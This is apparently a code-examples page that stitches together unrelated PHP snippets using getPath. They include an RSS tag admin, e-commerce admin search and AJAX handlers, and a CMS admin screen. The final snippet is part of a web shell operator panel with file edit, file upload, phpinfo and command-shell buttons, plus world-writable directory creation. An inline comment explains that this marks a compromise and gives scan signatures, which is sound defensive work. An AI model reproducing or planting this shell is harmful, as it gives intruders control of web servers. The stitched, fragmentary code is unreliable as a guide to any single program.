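                echo "</p>\n" . "<p><input type=\"submit\" name=\"" . CST_ADMIN_CONFIRMED . "\" value=\"" . __('No') . "\"/>\n" . "<input type=\"submit\" name=\"" . CST_ADMIN_CONFIRMED . "\" value=\"" . __('Yes') . "\"/>\n" . "<input type=\"hidden\" name=\"id\" value=\"{$tid}\"/>\n" . "<input type=\"hidden\" name=\"" . CST_ADMIN_DOMAIN . "\" value=\"" . CST_ADMIN_DOMAIN_TAGS . "\"/>\n" . "<input type=\"hidden\" name=\"action\" value=\"" . CST_ADMIN_DELETE_ACTION . "\"/>\n" . "</p>\n</form>\n";
                $ret__ = CST_ADMIN_DOMAIN_NONE;
            }
            break;
        case CST_ADMIN_SUBMIT_EDIT:
            // TBD
            $new_label = preg_replace(ALLOWED_TAGS_REGEXP, '', $_REQUEST['t_name']);
            // also replace whitespaces
            $new_label = str_replace(' ', '', $new_label);
            if (is_numeric($tid) && strlen($new_label) > 0) {
                $res = rss_query("select count(*) as cnt from " . getTable("tag") . " where binary tag='" . rss_real_escape_string($new_label) . "'");
                list($cnt) = rss_fetch_row($res);
                if ($cnt > 0) {
                    rss_error(sprintf(__("You can't rename this item '%s' because such an item already exists."), $new_label), RSS_ERROR_ERROR, true);
                    break;
                }
                rss_query("update " . getTable("tag") . " set tag='" . rss_real_escape_string($new_label) . "' where id={$tid}");
                rss_invalidate_cache();
            }
            break;
        default:
            break;
    }
    echo "<script type=\"text/javascript\">\n" . "//<!--\n" . "function cbtoggle() {\n" . "var c=document.getElementById('mastercb').checked;\n" . "var cs=document.getElementById('tagtable').getElementsByTagName('input');\n" . "for(i=0;i<cs.length;i++) {\n" . "if (cs[i].type == 'checkbox') cs[i].checked = c;\n" . "}\n" . "}\n" . "</script>\n";
    echo "<form method=\"post\" action=\"" . $self . "\">\n" . "<h2 class=\"trigger\">" . __('Tags') . "</h2>\n" . "<div id=\"admin_tags\" class=\"trigger\">" . "<table id=\"tagtable\">\n" . "<tr>\n" . "\t<th><input type=\"checkbox\" id=\"mastercb\" onclick=\"cbtoggle();\" /></th>\n" . "\t<th class=\"cntr\">" . __('Tags') . "</th>\n" . "\t<th>" . __('Action') . "</th>\n" . "</tr>\n";
    $sql = sprintf("select id, tag from %s t left join %s m on (t.id = m.tid) where m.ttype = 'item'", getTable("tag"), getTable("metatag"));
    $res = rss_query($sql);
    $cntr = 0;
    while (list($id, $tag) = rss_fetch_row($res)) {
        $class_ = $cntr++ % 2 == 0 ? "even" : "odd";
        echo "<tr class=\"{$class_}\">\n" . "\t<td><input type=\"checkbox\" name=\"tcb{$id}\" value=\"{$id}\" id=\"scb_{$id}\" /></td>\n" . "\t<td><label for=\"scb_{$id}\">" . htmlspecialchars($tag) . "</label></td>\n" . "\t<td><a href=\"" . $self . "?" . CST_ADMIN_DOMAIN . "=" . CST_ADMIN_DOMAIN_TAGS . "&amp;action=" . CST_ADMIN_EDIT_ACTION . "&amp;id={$id}\">" . __('edit') . "</a>\n" . "|<a href=\"" . $self . "?" . CST_ADMIN_DOMAIN . "=" . CST_ADMIN_DOMAIN_TAGS . "&amp;action=" . CST_ADMIN_DELETE_ACTION . "&amp;id={$id}\">" . __('delete') . "</a>\n" . "|<a href=\"" . getPath('tag/' . htmlspecialchars($tag)) . "\">" . __('view') . "</a>\n" . "</td>\n" . "</tr>\n";
    }
    echo "</table>\n";
    echo "<fieldset>\n" . "<legend>" . __('Selected') . "...</legend>\n" . "<p>\n" . "<input type=\"submit\" id=\"me_delete\" name=\"me_delete\" value=\"" . __('Delete') . "\" />\n" . "<input type=\"checkbox\" name=\"me_do_delete\" id=\"me_do_delete\" value=\"1\" />\n" . "<label for=\"me_do_delete\">" . __("I'm sure!") . "</label>\n" . "<input type=\"hidden\" name=\"action\" value=\"" . CST_ADMIN_DELETE_ACTION . "\" />\n" . "<input type=\"hidden\" name=\"" . CST_ADMIN_DOMAIN . "\" value=\"" . CST_ADMIN_DOMAIN_TAGS . "\" />\n" . "</fieldset>\n" . "</form>\n" . "</div>\n";
}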
 /**
  * Prepare the template variables for the search result view and render it.
  *
  * When errors are present only `query` and `show_toolbar` are set. Otherwise
  * the total result count is computed and each non-empty result list
  * (features, categories, products, customers, orders, modules, addons) is
  * exposed; products, customers and orders are rendered through HelperList.
  *
  * @return mixed Whatever parent::renderView() returns.
  */
 public function renderView()
 {
     // The search term is passed through Tools::safeOutput() before it reaches the template.
     $this->tpl_view_vars['query'] = Tools::safeOutput($this->query);
     $this->tpl_view_vars['show_toolbar'] = true;
     if (count($this->errors)) {
         return parent::renderView();
     }

     $nb_results = 0;
     foreach ($this->_list as $list) {
         if ($list != false) {
             $nb_results += count($list);
         }
     }
     $this->tpl_view_vars['nb_results'] = $nb_results;

     if (isset($this->_list['features']) && count($this->_list['features'])) {
         $this->tpl_view_vars['features'] = $this->_list['features'];
     }

     if (isset($this->_list['categories']) && count($this->_list['categories'])) {
         $categories = array();
         foreach ($this->_list['categories'] as $category) {
             $categories[] = getPath($this->context->link->getAdminLink('AdminCategories', false), $category['id_category']);
         }
         $this->tpl_view_vars['categories'] = $categories;
     }

     if (isset($this->_list['products']) && count($this->_list['products'])) {
         $this->initProductList();
         $helper = new HelperList();
         $helper->shopLinkType = '';
         $helper->simple_header = true;
         $helper->identifier = 'id_product';
         $helper->actions = array('edit');
         $helper->show_toolbar = false;
         $helper->table = 'product';
         $helper->currentIndex = $this->context->link->getAdminLink('AdminProducts', false);
         $helper->token = Tools::getAdminTokenLite('AdminProducts');
         $this->tpl_view_vars['products'] = $this->_list['products']
             ? $helper->generateList($this->_list['products'], $this->fields_list['products'])
             : '';
     }

     if (isset($this->_list['customers']) && count($this->_list['customers'])) {
         $this->initCustomerList();
         $helper = new HelperList();
         $helper->shopLinkType = '';
         $helper->simple_header = true;
         $helper->identifier = 'id_customer';
         $helper->actions = array('edit', 'view');
         $helper->show_toolbar = false;
         $helper->table = 'customer';
         $helper->currentIndex = $this->context->link->getAdminLink('AdminCustomers', false);
         $helper->token = Tools::getAdminTokenLite('AdminCustomers');
         $view = '';
         if ($this->_list['customers']) {
             // Add the order count of each customer before the list is generated.
             foreach ($this->_list['customers'] as $key => $val) {
                 $this->_list['customers'][$key]['orders'] = Order::getCustomerNbOrders((int) $val['id_customer']);
             }
             $view = $helper->generateList($this->_list['customers'], $this->fields_list['customers']);
         }
         $this->tpl_view_vars['customers'] = $view;
     }

     if (isset($this->_list['orders']) && count($this->_list['orders'])) {
         $this->initOrderList();
         $helper = new HelperList();
         $helper->shopLinkType = '';
         $helper->simple_header = true;
         $helper->identifier = 'id_order';
         $helper->actions = array('view');
         $helper->show_toolbar = false;
         $helper->table = 'order';
         $helper->currentIndex = $this->context->link->getAdminLink('AdminOrders', false);
         $helper->token = Tools::getAdminTokenLite('AdminOrders');
         $this->tpl_view_vars['orders'] = $this->_list['orders']
             ? $helper->generateList($this->_list['orders'], $this->fields_list['orders'])
             : '';
     }

     if (isset($this->_list['modules']) && count($this->_list['modules'])) {
         $this->tpl_view_vars['modules'] = $this->_list['modules'];
     }
     if (isset($this->_list['addons']) && count($this->_list['addons'])) {
         $this->tpl_view_vars['addons'] = $this->_list['addons'];
     }

     return parent::renderView();
 }
 /**
  * AJAX handler: validate a category id and a discount value from the request
  * and answer with a JSON document, then end the request.
  *
  * On success the JSON holds id_category, catPath, discount and hasError=false;
  * on failure it holds an errors list and hasError=true.
  */
 public function ajaxProcessAddCategoryReduction()
 {
     $category_reduction = Tools::getValue('category_reduction');
     $id_category = Tools::getValue('id_category');

     // The id is not cast up front; Validate::isUnsignedId() decides on the raw value.
     if (!Validate::isUnsignedId($id_category)) {
         $result = array(
             'errors' => array(Tools::displayError('Wrong category ID.')),
             'hasError' => true,
         );
     } elseif (!$this->validateDiscount($category_reduction)) {
         $result = array(
             'errors' => array(Tools::displayError('The discount value is incorrect (must be a percentage).')),
             'hasError' => true,
         );
     } else {
         $result = array(
             'id_category' => (int) $id_category,
             'catPath' => getPath(self::$currentIndex . '?tab=AdminCategories', (int) $id_category),
             'discount' => $category_reduction,
             'hasError' => false,
         );
     }

     die(Tools::jsonEncode($result));
 }
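 /**
  * Print the CMS admin screen: the category form, the page form, or (default)
  * the category breadcrumb followed by the category list and the page list.
  */
 public function display()
 {
     global $currentIndex;
     // `and` binds tighter than `or`: the form is shown when a submit produced
     // errors, or when an update/add parameter is present in the query string.
     if ((Tools::isSubmit('submitAddcms_category') or Tools::isSubmit('submitAddcms_categoryAndStay')) and sizeof($this->adminCMSCategories->_errors) or isset($_GET['updatecms_category']) or isset($_GET['addcms_category'])) {
         $this->adminCMSCategories->displayForm($this->token);
         echo '<br /><br /><a href="' . $currentIndex . '&token=' . $this->token . '"><img src="../img/admin/arrow2.gif" /> ' . $this->l('Back to list') . '</a><br />';
     } elseif ((Tools::isSubmit('submitAddcms') or Tools::isSubmit('submitAddcmsAndStay')) and sizeof($this->adminCMS->_errors) or isset($_GET['updatecms']) or isset($_GET['addcms'])) {
         $this->adminCMS->displayForm($this->token);
         echo '<br /><br /><a href="' . $currentIndex . '&token=' . $this->token . '"><img src="../img/admin/arrow2.gif" /> ' . $this->l('Back to list') . '</a><br />';
     } else {
         // The request value is cast to int; 0 (missing or non-numeric) falls back to category 1.
         $id_cms_category = (int) Tools::getValue('id_cms_category');
         if (!$id_cms_category) {
             $id_cms_category = 1;
         }
         $cms_tabs = array('cms_category', 'cms');
         // Strip each tab's ordering parameters from the breadcrumb base URL.
         // The subject is the running $catBarIndex (not $currentIndex), so the
         // cleanup done for one tab is kept when the next tab also matches.
         $catBarIndex = $currentIndex;
         foreach ($cms_tabs as $tab) {
             if (Tools::getValue($tab . 'Orderby') && Tools::getValue($tab . 'Orderway')) {
                 $catBarIndex = preg_replace('/&' . $tab . 'Orderby=([a-z _]*)&' . $tab . 'Orderway=([a-z]*)/i', '', $catBarIndex);
             }
         }
         echo '<div class="cat_bar"><span style="color: #3C8534;">' . $this->l('Current category') . ' :</span>&nbsp;&nbsp;&nbsp;' . getPath($catBarIndex, $id_cms_category, '', '', 'cms') . '</div>';
         echo '<h2>' . $this->l('Categories') . '</h2>';
         $this->adminCMSCategories->display($this->token);
         echo '<div style="margin:10px">&nbsp;</div>';
         echo '<h2>' . $this->l('Pages in this category') . '</h2>';
         $this->adminCMS->display($this->token);
     }
 }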
Example #30
            echo "can't make dir";
        } else {
            echo @mkdir("{$mkdirs}", 0777) ? "ok" : "";
            @chmod("{$mkdirs}", 0777);
        }
    }
}
/////////
// NOTE(review): this fragment builds an operator panel in one script: forms to
// edit or create a file, upload a file, show phpinfo and a submit button named
// 'shell', next to the request's host name and the client address. The lines
// just above create directories with mode 0777. That combination is
// characteristic of a web shell, not of an application feature. A file like
// this in a web root should be treated as an indicator of compromise: preserve
// it for forensics, then look for how it was written there (upload handlers,
// writable directories, stolen credentials).
// The form field names used below ('editfile', 'uploadfile', 'doupfile',
// 'uploaddir') are stable strings that can serve as content signatures when
// scanning a document root.
$pathname = str_replace('\\', '/', dirname(__FILE__));
////////
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir = $_post['dir'];
    $nowpath = getPath($pathname, $dir);
}
///////
// Reports whether the resolved directory is writable (dir_writeable() is not visible here).
$dir_writeable = dir_writeable($nowpath) ? "m" : "mm";
$phpinfo = !eregi("phpinfo", $dis_func) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = substr(PHP_OS, 0, 3) == 'WIN' ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
$tb = new FORMS();
$tb->tableheader();
// Banner row: request host name, a label and the client's address.
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td><b>' . $mohajer . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top');
// Action bar: directory listing, phpinfo and command submit buttons.
$tb->tdbody("<FORM method='POST' action='{$REQUEST_URI}' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value='  dir  '  id=input><INPUT type='submit'name='erne' value='erne '  id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
$tb->tablefooter();
$tb->tableheader();
// Section title (Turkish; roughly "edit or create file & upload file & create directory").
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur</b></td></tr></table>', 'center', 'top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
// File edit/create form.
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Dosya Duzenle weya Olustur:</FONT>' . $tb->makehidden('dir', getcwd()) . ' ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('Edit', 'Duzenle', '', 'submit')));
// File upload form (multipart), targeting the current directory.
$tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '<FONT COLOR=#9C9C9C>Dosya Yukle:</FONT>' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', 'Ekle', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden')));